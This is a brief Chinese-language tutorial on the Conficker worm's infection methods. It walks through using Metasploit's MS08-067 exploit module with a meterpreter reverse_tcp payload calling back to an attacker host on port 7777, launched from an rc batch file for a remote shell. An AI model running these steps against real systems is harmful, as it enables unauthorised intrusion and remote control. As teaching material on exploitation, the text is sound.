目录
1.1、分析:
在其基本的感染方法中, Conficker蠕虫使用了两种不同的攻击方法。
1、利用了Windows服务器中一个服务的Oday漏洞。利用这个栈溢出漏洞, 蠕虫能在被感染的主机上执行shellcode并下载蠕虫。
2、Conficker蠕虫暴力破解默认的管理员网络共享(ADMN$)的口令以获取肉机访问权。
2.1、分析:
利用Metasploit框架(http://metasploit.com/download/)简化攻击代码。作为一个开源计算机安全项目,很快就被广泛使用, 并且已经变成了一个漏洞利用代码的开发工具包。
Metasploit能让渗透测试人员在标准化和脚本化的环境中运行数以千计的不同的计算机漏洞利用代码。在Con.ticker蠕虫中使用的漏洞曝光后不久, HDMoore就将一个有效的漏洞利用代码整合进了框架内—-MS08-067 _netapi
2.2、示例:
虽然攻击者可以通过交互驱动的方式使用Metasploit, 但Metasploit也能读取批处理脚本(re)完成攻击。在攻击时,Metasploit会顺序执行批处理文件中的命令。
如使用ms08 _ 067 netapi (Conficker)攻击“ 肉机” (192.168.x.x), 使之与我们自己的主机192.168.xx.xx的7777端口建立一个反向shell
使用Metasploit进行攻击时, 先选好要用的漏洞利用代码(exploit/windows/smb/ms08 _ 067 _ netapi)
选定目标,目标设置为192.168.1.37
设定负载为windows/meterpreter/reverse _ tcp
将反向连接的目标设为主机192.168.77.77, 端口为7777
最后Metasploit去实施攻击。
将上面这些代码保存为文件conficker.rc。只要输入命令msfconsole -r conficker.rc, 就能发起攻击。这条命令让Metasploit运行脚本conficker.rc中的指令。如果攻击成功, 会返回一个让我们能控制目标计算机的Windows 命令行shell。